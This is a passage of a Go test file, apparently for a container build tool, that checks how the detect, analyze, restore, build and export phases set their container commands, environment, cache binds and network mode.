lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
it("configures the phase to copy app dir", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBind := "some-mount-source:/some-mount-target"
err := lifecycle.Detect(context.Background(), "test", []string{expectedBind}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBind)
h.AssertEq(t, len(configProvider.ContainerOps()), 2)
h.AssertFunctionName(t, configProvider.ContainerOps()[0], "EnsureVolumeAccess")
h.AssertFunctionName(t, configProvider.ContainerOps()[1], "CopyDir")
})
})
when("#Analyze", func() {
var fakeCache *fakes.FakeCache
it.Before(func() {
fakeCache = fakes.NewFakeCache()
fakeCache.ReturnForType = cache.Volume
})
it("creates a phase and then runs it", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory := fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
err := lifecycle.Analyze(context.Background(), "test", "test", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
h.AssertEq(t, fakePhase.CleanupCallCount, 1)
h.AssertEq(t, fakePhase.RunCallCount, 1)
})
when("clear cache", func() {
it("configures the phase with the expected arguments", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
err := lifecycle.Analyze(context.Background(), expectedRepoName, "test", false, "", true, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "analyzer")
h.AssertSliceContains(t, configProvider.ContainerConfig().Cmd, "-skip-layers")
})
})
when("clear cache is false", func() {
it("configures the phase with the expected arguments", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
err := lifecycle.Analyze(context.Background(), expectedRepoName, "test", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "analyzer")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-dir", "/cache"},
)
})
})
when("using a cache image", func() {
var (
lifecycle *build.LifecycleExecution
fakePhaseFactory *fakes.FakePhaseFactory
expectedRepoName = "some-repo-name"
)
it.Before(func() {
fakeCache.ReturnForType = cache.Image
fakeCache.ReturnForName = "some-cache-image"
lifecycle = newTestLifecycleExec(t, false, func(options *build.LifecycleOptions) {
options.GID = -1
})
fakePhaseFactory = fakes.NewFakePhaseFactory()
})
it("configures the phase with a build cache images", func() {
err := lifecycle.Analyze(context.Background(), expectedRepoName, "", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "analyzer")
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, ":/cache")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-image", "some-cache-image"},
)
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-dir", "/cache"},
)
})
when("clear-cache", func() {
it("cache is omitted from Analyze", func() {
err := lifecycle.Analyze(context.Background(), expectedRepoName, "", false, "", true, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "analyzer")
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-cache-image")
})
})
})
when("publish", func() {
it("runs the phase with the lifecycle image", func() {
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.LifecycleImage = "some-lifecycle-image"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Analyze(context.Background(), "test", "test", true, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().Image, "some-lifecycle-image")
})
it("sets the CNB_USER_ID and CNB_GROUP_ID in the environment", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithUID(2222), fakes.WithGID(3333))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, false, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Analyze(context.Background(), "test", "test", true, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_USER_ID=2222")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_GROUP_ID=3333")
})
it("configures the phase with registry access", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepos := "some-repo-name"
expectedNetworkMode := "some-network-mode"
err := lifecycle.Analyze(context.Background(), expectedRepos, expectedNetworkMode, true, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_REGISTRY_AUTH={}")
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
it("configures the phase with root", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Analyze(context.Background(), "test", "test", true, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().User, "root")
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
err := verboseLifecycle.Analyze(context.Background(), expectedRepoName, "test", true, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "analyzer")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
[]string{expectedRepoName},
)
})
it("configures the phase with binds", func() {
fakeCache.ReturnForName = "some-cache"
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBind := "some-cache:/cache"
err := lifecycle.Analyze(context.Background(), "test", "test", true, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBind)
})
when("using a cache image", func() {
it.Before(func() {
fakeCache.ReturnForName = "some-cache-image"
fakeCache.ReturnForType = cache.Image
})
it("configures the phase with a build cache images", func() {
lifecycle := newTestLifecycleExec(t, false, func(options *build.LifecycleOptions) {
options.GID = -1
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
err := lifecycle.Analyze(context.Background(), expectedRepoName, "test", true, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, ":/cache")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-image", "some-cache-image"},
)
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-dir", "/cache"},
)
})
})
})
when("publish is false", func() {
it("runs the phase with the lifecycle image", func() {
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.LifecycleImage = "some-lifecycle-image"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Analyze(context.Background(), "test", "test", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().Image, "some-lifecycle-image")
})
it("sets the CNB_USER_ID and CNB_GROUP_ID in the environment", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithUID(2222), fakes.WithGID(3333))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, false, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Analyze(context.Background(), "test", "test", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_USER_ID=2222")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_GROUP_ID=3333")
})
it("configures the phase with daemon access", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Analyze(context.Background(), "test", "test", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().User, "root")
h.AssertSliceContains(t, configProvider.HostConfig().Binds, "/var/run/docker.sock:/var/run/docker.sock")
})
it("configures the phase with daemon access with TCP docker-host", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Analyze(context.Background(), "test", "test", false, "tcp://localhost:1234", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, "/var/run/docker.sock:/var/run/docker.sock")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "DOCKER_HOST=tcp://localhost:1234")
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
err := verboseLifecycle.Analyze(context.Background(), expectedRepoName, "test", false, "", true, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "analyzer")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
[]string{"-daemon"},
[]string{expectedRepoName},
)
})
it("configures the phase with the expected network mode", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedNetworkMode := "some-network-mode"
err := lifecycle.Analyze(context.Background(), "test", expectedNetworkMode, false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
it("configures the phase with binds", func() {
fakeCache.ReturnForName = "some-cache"
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBind := "some-cache:/cache"
err := lifecycle.Analyze(context.Background(), "test", "test", false, "", true, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBind)
})
})
when("override GID", func() {
var (
lifecycle *build.LifecycleExecution
fakePhaseFactory *fakes.FakePhaseFactory
)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory = fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
when("override GID is provided", func() {
it.Before(func() {
lifecycle = newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = 2
})
})
it("configures the phase with the expected arguments", func() {
err := lifecycle.Analyze(context.Background(), "test", "test", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-gid", "2"},
)
})
})
when("override GID is not provided", func() {
it.Before(func() {
lifecycle = newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = -1
})
})
it("gid is not added to the expected arguments", func() {
err := lifecycle.Analyze(context.Background(), "test", "test", false, "", false, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-gid")
})
})
})
})
when("#Restore", func() {
var fakeCache *fakes.FakeCache
it.Before(func() {
fakeCache = fakes.NewFakeCache()
fakeCache.ReturnForName = "some-cache"
fakeCache.ReturnForType = cache.Volume
})
it("runs the phase with the lifecycle image", func() {
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.LifecycleImage = "some-lifecycle-image"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().Image, "some-lifecycle-image")
})
it("sets the CNB_USER_ID and CNB_GROUP_ID in the environment", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithUID(2222), fakes.WithGID(3333))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, false, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_USER_ID=2222")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_GROUP_ID=3333")
})
it("creates a phase and then runs it", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory := fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
err := lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
h.AssertEq(t, fakePhase.CleanupCallCount, 1)
h.AssertEq(t, fakePhase.RunCallCount, 1)
})
it("configures the phase with root access", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().User, "root")
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "restorer")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
[]string{"-cache-dir", "/cache"},
)
})
it("configures the phase with the expected network mode", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedNetworkMode := "some-network-mode"
err := lifecycle.Restore(context.Background(), expectedNetworkMode, fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
it("configures the phase with binds", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBind := "some-cache:/cache"
err := lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBind)
})
when("using cache image", func() {
var (
lifecycle *build.LifecycleExecution
fakePhaseFactory *fakes.FakePhaseFactory
)
it.Before(func() {
fakeCache.ReturnForType = cache.Image
fakeCache.ReturnForName = "some-cache-image"
lifecycle = newTestLifecycleExec(t, false, func(options *build.LifecycleOptions) {
options.GID = -1
})
fakePhaseFactory = fakes.NewFakePhaseFactory()
})
it("configures the phase with a cache image", func() {
err := lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, ":/cache")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-image", "some-cache-image"},
)
})
})
when("override GID", func() {
var (
lifecycle *build.LifecycleExecution
fakePhaseFactory *fakes.FakePhaseFactory
)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory = fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
when("override GID is provided", func() {
it.Before(func() {
lifecycle = newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = 2
})
})
it("configures the phase with the expected arguments", func() {
err := lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-gid", "2"},
)
})
})
when("override GID is not provided", func() {
it.Before(func() {
lifecycle = newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = -1
})
})
it("gid is not added to the expected arguments", func() {
err := lifecycle.Restore(context.Background(), "test", fakeCache, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-gid")
})
})
})
})
when("#Build", func() {
it("creates a phase and then runs it", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory := fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
err := lifecycle.Build(context.Background(), "test", []string{}, fakePhaseFactory)
h.AssertNil(t, err)
h.AssertEq(t, fakePhase.CleanupCallCount, 1)
h.AssertEq(t, fakePhase.RunCallCount, 1)
})
it("configures the phase with the expected arguments", func() {
fakeBuilder, err := fakes.NewFakeBuilder()
h.AssertNil(t, err)
verboseLifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = verboseLifecycle.Build(context.Background(), "test", []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "builder")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
)
})
it("configures the phase with the expected network mode", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedNetworkMode := "some-network-mode"
err := lifecycle.Build(context.Background(), expectedNetworkMode, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
it("configures the phase with binds", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBind := "some-mount-source:/some-mount-target"
err := lifecycle.Build(context.Background(), "test", []string{expectedBind}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBind)
})
})
when("#Export", func() {
var (
fakeBuildCache *fakes.FakeCache
fakeLaunchCache *fakes.FakeCache
)
it.Before(func() {
fakeBuildCache = fakes.NewFakeCache()
fakeBuildCache.ReturnForType = cache.Volume
fakeBuildCache.ReturnForName = "some-cache"
fakeLaunchCache = fakes.NewFakeCache()
fakeLaunchCache.ReturnForType = cache.Volume
fakeLaunchCache.ReturnForName = "some-launch-cache"
})
it("creates a phase and then runs it", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory := fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
h.AssertEq(t, fakePhase.CleanupCallCount, 1)
h.AssertEq(t, fakePhase.RunCallCount, 1)
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
expectedRunImage := "some-run-image"
err := verboseLifecycle.Export(context.Background(), expectedRepoName, expectedRunImage, false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "exporter")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
[]string{"-cache-dir", "/cache"},
[]string{"-run-image", expectedRunImage},
[]string{expectedRepoName},
)
})
when("additional tags are specified", func() {
it("passes tag arguments to the exporter", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
expectedRunImage := "some-run-image"
additionalTags := []string{"additional-tag-1", "additional-tag-2"}
err := verboseLifecycle.Export(context.Background(), expectedRepoName, expectedRunImage, false, "", "test", fakes.NewFakeCache(), fakes.NewFakeCache(), additionalTags, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "exporter")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
[]string{"-cache-dir", "/cache"},
[]string{"-run-image", expectedRunImage},
[]string{expectedRepoName, additionalTags[0], additionalTags[1]},
)
})
})
when("using cache image", func() {
it.Before(func() {
fakeBuildCache.ReturnForType = cache.Image
fakeBuildCache.ReturnForName = "some-cache-image"
})
it("configures phase with cache image", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
expectedRunImage := "some-run-image"
err := verboseLifecycle.Export(context.Background(), expectedRepoName, expectedRunImage, false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "exporter")
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, ":/cache")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-image", "some-cache-image"},
)
})
})
when("publish", func() {
it("runs the phase with the lifecycle image", func() {
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.LifecycleImage = "some-lifecycle-image"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().Image, "some-lifecycle-image")
})
it("sets the CNB_USER_ID and CNB_GROUP_ID in the environment", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithUID(2222), fakes.WithGID(3333))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, false, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_USER_ID=2222")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_GROUP_ID=3333")
})
it("configures the phase with registry access", func() {
lifecycle := newTestLifecycleExec(t, false)
